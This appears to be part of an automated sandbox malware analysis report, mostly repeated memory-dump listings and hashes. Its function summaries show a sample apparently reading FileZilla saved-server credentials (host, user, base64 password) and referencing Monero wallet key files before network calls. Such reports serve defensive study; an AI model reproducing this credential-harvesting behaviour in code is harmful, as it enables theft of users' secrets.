                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 75afb0bc6c4a0ace08ba33ce0d0a248d089b160b27d6284a961f4796d5812cd9
                                    • Instruction ID: f7c6a352fe9edc0820c47706fa353df15ba8dc28011464d2b637f6cd8a1028f6
                                    • Opcode Fuzzy Hash: 75afb0bc6c4a0ace08ba33ce0d0a248d089b160b27d6284a961f4796d5812cd9
                                    • Instruction Fuzzy Hash: 87518DF3A1C6088FE348AE7DEC9533AB6D5DB84310F1A463DE6C5C7784F97899058286
                                    Function 009C9489 Relevance: .2, Instructions: 172COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b079815c4f6804b76382f506f076b3dfb49b44dbbc38fa4a2396c6766d8df211
                                    • Instruction ID: c0d129d55e1cf5eec3f262540ac7cfadd2ce70f410af4e24c31a631ebdffc1aa
                                    • Opcode Fuzzy Hash: b079815c4f6804b76382f506f076b3dfb49b44dbbc38fa4a2396c6766d8df211
                                    • Instruction Fuzzy Hash: AF51FAB3B193009FE3009E2DDC81B7AB7E5EF98720F1A493DE6C4C7744E63998458A56
                                    Function 00B4E14B Relevance: .2, Instructions: 151COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 8e1ccd29888a1eefadc1563013e5b654059da06a1b677114262012f61c6bf834
                                    • Instruction ID: 28da1c9a1a10e0a2be22f789abf6b5c9814d844211416d82c6c45d3f31fa0067
                                    • Opcode Fuzzy Hash: 8e1ccd29888a1eefadc1563013e5b654059da06a1b677114262012f61c6bf834
                                    • Instruction Fuzzy Hash: 0151C1B250D700AFD304AF29D94622EF7E4FF94B20F15C82DE5C947650EA349881DB47
                                    Function 00AEBFDB Relevance: .1, Instructions: 149COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 3b07fe6872fb6ca36f6d047ca1b09486a524560a740f6e0a7d2de038cd7298a1
                                    • Instruction ID: e022452287d6afefc6d6fe2898f0c0afe30644e5ea1a2c2abe290edaba208ffc
                                    • Opcode Fuzzy Hash: 3b07fe6872fb6ca36f6d047ca1b09486a524560a740f6e0a7d2de038cd7298a1
                                    • Instruction Fuzzy Hash: 8041E0B350C284EFD315AE16DC8167AB7F5EB84370F36892EE6C697604E6311842E783
                                    Function 006F6799 Relevance: .1, Instructions: 131COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2a8b669df8d736d86e52b1f6831f1fee8e67c9cfb658995c3eff484ea6ea57f1
                                    • Instruction ID: d5a8765de7582f20e25b690d8e945ceca3a08ebf1fb92a5dd2b9cef0ca49b8ce
                                    • Opcode Fuzzy Hash: 2a8b669df8d736d86e52b1f6831f1fee8e67c9cfb658995c3eff484ea6ea57f1
                                    • Instruction Fuzzy Hash: 8E516B62E09BD989C7058B7584502EEBFB25FE6200F1E839EC4981F383C3759689D3E5
                                    Function 00B6AF6E Relevance: .1, Instructions: 78COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0fabcc7b0ae5aa6cf405f6e72cf4579d8476e33d06db4118e831670f33ffba4c
                                    • Instruction ID: b35b4ed515ce28656d093d3f4da04e2ebbc731856f78e54aa434c054c7670345
                                    • Opcode Fuzzy Hash: 0fabcc7b0ae5aa6cf405f6e72cf4579d8476e33d06db4118e831670f33ffba4c
                                    • Instruction Fuzzy Hash: 0021B2B250C6089FD315BF29D8856AEFBE8EF58710F16082DE6D483610E771A8908B97
                                    Function 00B9FD7B Relevance: .1, Instructions: 71COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 1c75ff979e54892355f0b6fb7965c7c5c85e6a0a3b9de7ef072cd481e0f4eb7c
                                    • Instruction ID: 09c51cf8435ecac49ee6cda4bcd329bfebcba0d399647753a39aa06d0ff17778
                                    • Opcode Fuzzy Hash: 1c75ff979e54892355f0b6fb7965c7c5c85e6a0a3b9de7ef072cd481e0f4eb7c
                                    • Instruction Fuzzy Hash: 122166F250C300AFE74DAE54EC96A7AB7E1FB58310F05092ED7D782290EA315514D657
                                    Function 006C75A8 Relevance: .0, Instructions: 15COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: dffa8fe14fb17786e60520bf3c8c8ace1f347de8b7b0a65a7913e683934b358a
                                    • Instruction ID: 6f3579539133c16e82723237803b8971b03cd8b531f9f429ebb9f832563e04b3
                                    • Opcode Fuzzy Hash: dffa8fe14fb17786e60520bf3c8c8ace1f347de8b7b0a65a7913e683934b358a
                                    • Instruction Fuzzy Hash: 27D0C971A097118FC3688F1EF440546FAE8EBD8320715C53FA09EC3750C6B494418B54
                                    Function 00699AA0 Relevance: .0, Instructions: 15COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                    • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                    • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                    • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                    Function 006903B0 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0069AA50: lstrcpy.KERNEL32(006A0E1A,00000000), ref: 0069AA98
                                      • Part of subcall function 00698F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00698F9B
                                      • Part of subcall function 0069AC30: lstrcpy.KERNEL32(00000000,?), ref: 0069AC82
                                      • Part of subcall function 0069AC30: lstrcat.KERNEL32(00000000), ref: 0069AC92
                                      • Part of subcall function 0069ABB0: lstrcpy.KERNEL32(?,006A0E1A), ref: 0069AC15
                                      • Part of subcall function 0069ACC0: lstrlen.KERNEL32(?,01428E68,?,\Monero\wallet.keys,006A0E1A), ref: 0069ACD5
                                      • Part of subcall function 0069ACC0: lstrcpy.KERNEL32(00000000), ref: 0069AD14
                                      • Part of subcall function 0069ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AD22
                                      • Part of subcall function 0069AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0069AAF6
                                      • Part of subcall function 0068A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0068A13C
                                      • Part of subcall function 0068A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0068A161
                                      • Part of subcall function 0068A110: LocalAlloc.KERNEL32(00000040,?), ref: 0068A181
                                      • Part of subcall function 0068A110: ReadFile.KERNEL32(000000FF,?,00000000,0068148F,00000000), ref: 0068A1AA
                                      • Part of subcall function 0068A110: LocalFree.KERNEL32(0068148F), ref: 0068A1E0
                                      • Part of subcall function 0068A110: CloseHandle.KERNEL32(000000FF), ref: 0068A1EA
                                      • Part of subcall function 00698FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00698FE2
                                    • GetProcessHeap.KERNEL32(00000000,000F423F,006A0DBF,006A0DBE,006A0DBB,006A0DBA), ref: 006904C2
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 006904C9
                                    • StrStrA.SHLWAPI(00000000,<Host>), ref: 006904E5
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006A0DB7), ref: 006904F3
                                    • StrStrA.SHLWAPI(00000000,<Port>), ref: 0069052F
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006A0DB7), ref: 0069053D
                                    • StrStrA.SHLWAPI(00000000,<User>), ref: 00690579
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006A0DB7), ref: 00690587
                                    • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 006905C3
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006A0DB7), ref: 006905D5
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006A0DB7), ref: 00690662
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006A0DB7), ref: 0069067A
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006A0DB7), ref: 00690692
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006A0DB7), ref: 006906AA
                                    • lstrcat.KERNEL32(?,browser: FileZilla), ref: 006906C2
                                    • lstrcat.KERNEL32(?,profile: null), ref: 006906D1
                                    • lstrcat.KERNEL32(?,url: ), ref: 006906E0
                                    • lstrcat.KERNEL32(?,00000000), ref: 006906F3
                                    • lstrcat.KERNEL32(?,006A1770), ref: 00690702
                                    • lstrcat.KERNEL32(?,00000000), ref: 00690715
                                    • lstrcat.KERNEL32(?,006A1774), ref: 00690724
                                    • lstrcat.KERNEL32(?,login: ), ref: 00690733
                                    • lstrcat.KERNEL32(?,00000000), ref: 00690746
                                    • lstrcat.KERNEL32(?,006A1780), ref: 00690755
                                    • lstrcat.KERNEL32(?,password: ), ref: 00690764
                                    • lstrcat.KERNEL32(?,00000000), ref: 00690777
                                    • lstrcat.KERNEL32(?,006A1790), ref: 00690786
                                    • lstrcat.KERNEL32(?,006A1794), ref: 00690795
                                    • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006A0DB7), ref: 006907EE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                                    • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                    • API String ID: 1942843190-555421843
                                    • Opcode ID: 8520f63f02d03f0593ae03797a86faefb4f23f803f5df1778e3579e174eabe0f
                                    • Instruction ID: 1b52e6f80780432e0ead519ae9878b79cddb2c92e57d80e470c3a40d42a8781f
                                    • Opcode Fuzzy Hash: 8520f63f02d03f0593ae03797a86faefb4f23f803f5df1778e3579e174eabe0f
                                    • Instruction Fuzzy Hash: 66D13E72914208ABDF44FBF0DD96EEEB37EAF15301F108558F102A6595DF30AA48CBA5
                                    Function 006859B0 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495networkstringmemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0069AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0069AAF6
                                      • Part of subcall function 00684800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00684889
                                      • Part of subcall function 00684800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00684899
                                      • Part of subcall function 0069AA50: lstrcpy.KERNEL32(006A0E1A,00000000), ref: 0069AA98
                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00685A48
